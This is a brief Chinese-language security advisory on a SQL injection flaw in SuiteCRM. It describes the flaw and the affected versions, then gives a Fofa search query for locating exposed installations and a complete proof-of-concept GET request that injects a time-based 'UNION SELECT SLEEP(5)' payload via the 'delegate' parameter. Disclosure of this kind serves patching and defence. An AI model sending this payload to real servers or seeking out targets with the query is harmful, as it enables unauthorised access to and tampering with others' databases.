0x01 产品描述：

        SuiteCRM是一款开源的CRM（客户关系管理）系统，它致力于为世界各地的用户提供高效、灵活和可定制的CRM解决方案。它为企业和组织提供了一套完整的客户关系管理解决方案，无论是中小型企业还是大型企业，SuiteCRM都能满足各种业务需求，并提供了一系列的功能来帮助管理销售、营销和客户服务等方面的工作。

0x02 漏洞描述：

        SQL注入漏洞通常是由于Web应用程序未能充分过滤用户输入的数据所致。在SuiteCRM的这次漏洞中，攻击者可以通过构造特殊的输入作为参数传入Web应用程序，这些输入被直接用于SQL查询语句中，从而改变了原有查询的逻辑和功能。由于系统未能有效识别和阻止这些恶意输入，攻击者能够执行未经授权的数据库操作，如查询、修改或删除数据。

0x03 影响版本：

SuiteCRM < 7.14.4
SuiteCRM < 8.6.1

0x04 搜索语句：

Fofa：title="SuiteCRM"

0x05 漏洞复现：

GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

0x06 修复建议：

厂商已发布补丁，请即时修复。